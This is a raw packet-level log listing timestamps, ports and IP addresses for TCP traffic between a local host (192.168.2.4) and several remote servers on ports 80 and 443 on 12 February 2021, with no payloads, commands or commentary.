Feb 12, 2021 01:48:04.572441101 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.572458982 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.572479010 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.572500944 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.572510958 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.572535038 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.572562933 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.596117973 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.596168041 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.596201897 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.596221924 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.596230984 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.596246958 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.596271992 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.596288919 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.596323967 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.596343040 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.596352100 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.596393108 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.596410990 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.609874010 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.609929085 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.609970093 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610008955 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610008955 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610050917 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610058069 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610076904 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610101938 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610122919 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610141993 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610160112 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610183001 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610200882 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610223055 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610239029 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610261917 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610284090 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610302925 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610333920 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610342026 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.610357046 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.610399008 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.614025116 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.614085913 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.614126921 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.614145041 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.614167929 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.614202023 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.614207983 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.614228964 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.614257097 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.614547968 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.616729021 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.640156984 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.642566919 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650357008 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650420904 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650459051 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650501013 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650517941 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650542021 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650568962 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650580883 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650590897 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650616884 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650651932 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650664091 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650686979 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650697947 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650722980 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650728941 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650758028 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650769949 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650801897 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.650803089 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.650845051 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.653033018 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.653069973 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.653105021 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.653116941 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.653141022 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.653151035 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.653184891 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.653187037 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.653228998 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.654905081 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.654987097 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.670701027 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.670887947 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.690004110 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690026999 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690040112 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690052986 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690068007 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690083981 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690099001 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690114021 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690126896 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690143108 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690143108 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.690155983 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690174103 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.690176964 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.690184116 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.690227032 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.690905094 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.691385984 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.693525076 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.693546057 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.693558931 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.693578005 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.693594933 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.693604946 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.693631887 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.693656921 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.694679022 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.694811106 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.716877937 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.717137098 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.732676029 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732716084 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732741117 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732764959 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732789040 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732812881 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732845068 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732872963 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732888937 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.732908010 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732918978 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.732924938 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.732935905 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732961893 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732970953 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.732989073 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.732991934 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.733028889 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.733041048 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.734857082 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.734889030 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.734914064 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.734940052 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.734965086 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.734992981 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.735012054 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735021114 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.735040903 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735047102 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735052109 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735053062 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.735083103 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.735086918 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735102892 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735110998 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.735136986 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.735167027 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735181093 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.735187054 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.737255096 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.738595963 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.745199919 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.750575066 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.773207903 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.773245096 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.773273945 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.773303032 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.773338079 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.773380041 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.773427963 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.773474932 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.774552107 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.775543928 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775584936 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775665045 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.775687933 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.775765896 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775815964 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775837898 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.775860071 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775882006 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.775898933 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775927067 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.775938034 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775978088 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.775986910 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.776021004 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.776037931 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.776063919 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.776077986 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.776103020 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.776117086 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.776156902 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.776169062 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.777896881 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.778568029 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.792886019 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.794672012 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.811646938 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.811670065 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.811682940 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.811698914 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.811717033 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.811733961 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.811851978 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.811898947 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.814378023 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.814663887 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.817914009 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.817934990 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.817951918 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.817965984 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.817981958 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818000078 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818015099 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818031073 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818034887 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818048000 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818064928 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818069935 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818072081 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818077087 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818082094 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818089008 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818104982 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818114042 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818120956 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818135023 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818139076 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818154097 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818170071 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:04.818177938 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818202019 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.818237066 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.820844889 CET	49765	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:04.895078897 CET	80	49765	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:05.085619926 CET	49764	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:05.175679922 CET	80	49764	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:05.178750038 CET	49764	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:05.192600965 CET	49764	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:05.270143986 CET	80	49764	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:06.973057985 CET	49767	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:06.973552942 CET	49766	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:07.049366951 CET	80	49766	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:07.049478054 CET	80	49767	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:07.049591064 CET	49766	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:07.049701929 CET	49767	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:07.052175999 CET	49766	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:07.167850018 CET	80	49766	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:07.458751917 CET	80	49766	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:07.458777905 CET	80	49766	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:07.458870888 CET	49766	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:07.460927963 CET	49766	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:48:07.535233974 CET	80	49766	35.228.31.40	192.168.2.4
Feb 12, 2021 01:48:08.575541019 CET	49767	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:49:03.115273952 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:49:03.115315914 CET	443	49732	87.248.118.23	192.168.2.4
Feb 12, 2021 01:49:03.119642019 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:49:03.995445013 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:49:03.995493889 CET	443	49733	87.248.118.23	192.168.2.4
Feb 12, 2021 01:49:03.995517969 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:49:03.995542049 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:10.124258995 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:10.127156973 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:10.127254009 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.127315998 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.127377033 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.127501011 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.127526999 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.127562046 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.130064011 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:50:10.130117893 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:50:10.170569897 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.170602083 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.170627117 CET	443	49736	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.170651913 CET	443	49737	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.170711994 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.170711994 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.170747042 CET	49736	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.170749903 CET	49737	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.170942068 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.170978069 CET	443	49739	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.171004057 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.171019077 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.171029091 CET	443	49734	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.171041965 CET	49739	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.171132088 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.171178102 CET	49734	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.171739101 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.171766996 CET	443	49735	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.171799898 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.171823978 CET	49735	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.174639940 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.174669027 CET	443	49738	151.101.1.44	192.168.2.4
Feb 12, 2021 01:50:10.174740076 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.174793005 CET	49738	443	192.168.2.4	151.101.1.44
Feb 12, 2021 01:50:10.176513910 CET	443	49720	104.20.185.68	192.168.2.4
Feb 12, 2021 01:50:10.176595926 CET	49720	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:50:10.177536964 CET	443	49721	104.20.185.68	192.168.2.4
Feb 12, 2021 01:50:10.177664995 CET	49721	443	192.168.2.4	104.20.185.68
Feb 12, 2021 01:50:10.543024063 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:10.621186972 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:10.905265093 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:10.985728025 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:10.985826015 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:10.985950947 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.045654058 CET	49771	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.073921919 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.073970079 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074007988 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074033022 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.074083090 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074124098 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074150085 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.074176073 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074214935 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074233055 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.074250937 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074289083 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074306965 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.074353933 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.074415922 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.123105049 CET	80	49771	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.123292923 CET	49771	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.123406887 CET	49771	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.151784897 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151818037 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151829958 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151842117 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151859045 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151874065 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151890039 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151901960 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151917934 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151932955 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151932001 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.151948929 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151964903 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151983976 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.151993990 CET	49770	80	192.168.2.4	35.228.31.40
